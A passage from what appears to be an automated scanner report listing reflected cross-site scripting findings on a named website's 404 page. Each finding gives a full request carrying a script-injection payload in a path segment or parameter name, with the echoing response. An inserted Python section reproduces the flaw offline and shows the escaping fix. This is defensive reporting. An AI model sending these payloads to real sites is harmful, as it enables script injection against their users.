Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c7eb<script>alert(1)</script>c21c11603f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/0.gif?7c7eb<script>alert(1)</script>c21c11603f6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/0.gif?7c7eb<script>alert(1)</script>c21c11603f6=1 was not found on this server.</p>
...[SNIP]...

2.85. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47d1d<script>alert(1)</script>b7c8b3bf3ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult47d1d<script>alert(1)</script>b7c8b3bf3ac/media-chat/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult47d1d<script>alert(1)</script>b7c8b3bf3ac/media-chat/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.86. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70587<script>alert(1)</script>66d5e9d1a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat70587<script>alert(1)</script>66d5e9d1a3/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat70587<script>alert(1)</script>66d5e9d1a3/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.87. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b908b<script>alert(1)</script>37312c143be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesb908b<script>alert(1)</script>37312c143be/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesb908b<script>alert(1)</script>37312c143be/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.88. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5bb6d<script>alert(1)</script>aeb33bd428a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos5bb6d<script>alert(1)</script>aeb33bd428a/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos5bb6d<script>alert(1)</script>aeb33bd428a/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.89. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 115dc<script>alert(1)</script>3f0dab8b896 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images115dc<script>alert(1)</script>3f0dab8b896/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images115dc<script>alert(1)</script>3f0dab8b896/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.90. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a289b<script>alert(1)</script>c4e68e05bd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratinga289b<script>alert(1)</script>c4e68e05bd8/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratinga289b<script>alert(1)</script>c4e68e05bd8/3half.gif was not found on this server.</p>
...[SNIP]...

2.91. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fbb09<script>alert(1)</script>7e22cdc7464 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/3half.giffbb09<script>alert(1)</script>7e22cdc7464 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/3half.giffbb09<script>alert(1)</script>7e22cdc7464 was not found on this server.</p>
...[SNIP]...

2.92. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d9b7<script>alert(1)</script>5062acd7568 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/3half.gif?2d9b7<script>alert(1)</script>5062acd7568=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/3half.gif?2d9b7<script>alert(1)</script>5062acd7568=1 was not found on this server.</p>
...[SNIP]...
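
Findings 2.86 through 2.92 above all hit the same sink: the host's custom 404 page prints the requested URL between <p> tags without HTML-encoding it, so any path segment or query-parameter name that carries a tag is reflected intact. The Python below is an added example written for this report, not code from the scanner or from resellerbase.com. It reproduces the unsafe and the encoded rendering of that 404 paragraph (the template string is a reconstruction from the responses shown above; render_404_unsafe, render_404_safe, classify_reflection, scan_rest_segments and probe_query_name are hypothetical names) and replays the scanner's per-segment and parameter-name probes against both renderings offline, so the "echoed unmodified" claim can be re-checked without touching the target.

```python
import html


def render_404_unsafe(request_uri: str) -> str:
    """Reproduces the defect seen in this report: the requested URI is dropped
    into the 404 page's HTML untouched. Template reconstructed from the
    responses above; the rest of the page is elided because only this
    paragraph is the sink."""
    return f"<p>The requested URL {request_uri} was not found on this server.</p>"


def render_404_safe(request_uri: str) -> str:
    """Hardened rendering: HTML-encode the URI before placing it between tags.

    html.escape(quote=True) covers & < > " ' which is sufficient for a text
    node (and for a quoted attribute), so one helper serves both contexts."""
    return (
        "<p>The requested URL "
        f"{html.escape(request_uri, quote=True)}"
        " was not found on this server.</p>"
    )


def classify_reflection(body: str, payload: str) -> str:
    """Classify how a probe payload came back in a response body.

    'raw'     - present byte-for-byte: the tags survive, so script executes
    'encoded' - present only with < > & " ' escaped: rendered as text
    'absent'  - not reflected at all
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def scan_rest_segments(path, render=render_404_unsafe, prefix="xs1", suffix="9z"):
    """Mimic the scanner's 'REST URL parameter N' probes.

    The payload is appended to each path segment in turn (segments are
    numbered from 1, as in the report), the 404 page is rendered for that URI,
    and the result is {segment_number: classification}. `render` stands in for
    an HTTP round trip so the check runs offline; swap in a function that
    fetches the real body for a live re-test. `prefix`/`suffix` play the role
    of the random hex the scanner wraps around its payload so a reflection can
    be matched unambiguously."""
    payload = f"{prefix}<script>alert(1)</script>{suffix}"
    segments = path.lstrip("/").split("/")
    results = {}
    for index, segment in enumerate(segments, start=1):
        probed = list(segments)
        probed[index - 1] = segment + payload
        uri = "/" + "/".join(probed)
        results[index] = classify_reflection(render(uri), payload)
    return results


def probe_query_name(path, render=render_404_unsafe, prefix="xs1", suffix="9z"):
    """Mimic the 'name of an arbitrarily supplied request parameter' probe:
    the payload is used as a query-string parameter name with the value 1."""
    payload = f"{prefix}<script>alert(1)</script>{suffix}"
    return classify_reflection(render(f"{path}?{payload}=1"), payload)


if __name__ == "__main__":
    target = "/adult/media-chat/themes/kosmos/images/rating/3half.gif"
    for label, render in (("unsafe", render_404_unsafe), ("escaped", render_404_safe)):
        print(label, scan_rest_segments(target, render), probe_query_name(target, render))
```

Against the unsafe rendering every one of the seven segments and the parameter name come back as `raw`, which is exactly the pattern of findings 2.86 to 2.92; against the escaped rendering they all come back as `encoded`, which is the state the fix should leave the page in. One caveat on impact: a victim has to be made to request a URL whose path contains a literal `<`, and whether a given browser sends those characters raw or percent-encodes them in the path is something to verify per browser before rating these for real-world exploitability; the scanner sent them raw.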

2.93. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a0fd<script>alert(1)</script>b61da89c8f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult9a0fd<script>alert(1)</script>b61da89c8f1/media-chat/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult9a0fd<script>alert(1)</script>b61da89c8f1/media-chat/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.94. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78656<script>alert(1)</script>64dc557d70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat78656<script>alert(1)</script>64dc557d70/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat78656<script>alert(1)</script>64dc557d70/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.95. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload be2f9<script>alert(1)</script>618e7765039 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesbe2f9<script>alert(1)</script>618e7765039/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesbe2f9<script>alert(1)</script>618e7765039/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.96. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7c7e7<script>alert(1)</script>df3bcb58741 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos7c7e7<script>alert(1)</script>df3bcb58741/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos7c7e7<script>alert(1)</script>df3bcb58741/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.97. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7683<script>alert(1)</script>03707598cfd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagesf7683<script>alert(1)</script>03707598cfd/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagesf7683<script>alert(1)</script>03707598cfd/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.98. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d9909<script>alert(1)</script>6702c56ed93 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratingd9909<script>alert(1)</script>6702c56ed93/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratingd9909<script>alert(1)</script>6702c56ed93/4.gif was not found on this server.</p>
...[SNIP]...

2.99. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 20ca6<script>alert(1)</script>54859c137 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4.gif20ca6<script>alert(1)</script>54859c137 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4.gif20ca6<script>alert(1)</script>54859c137 was not found on this server.</p>
...[SNIP]...

2.100. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc88b<script>alert(1)</script>17ece1eaeb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4.gif?fc88b<script>alert(1)</script>17ece1eaeb1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4.gif?fc88b<script>alert(1)</script>17ece1eaeb1=1 was not found on this server.</p>
...[SNIP]...

2.101. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/4half.gif

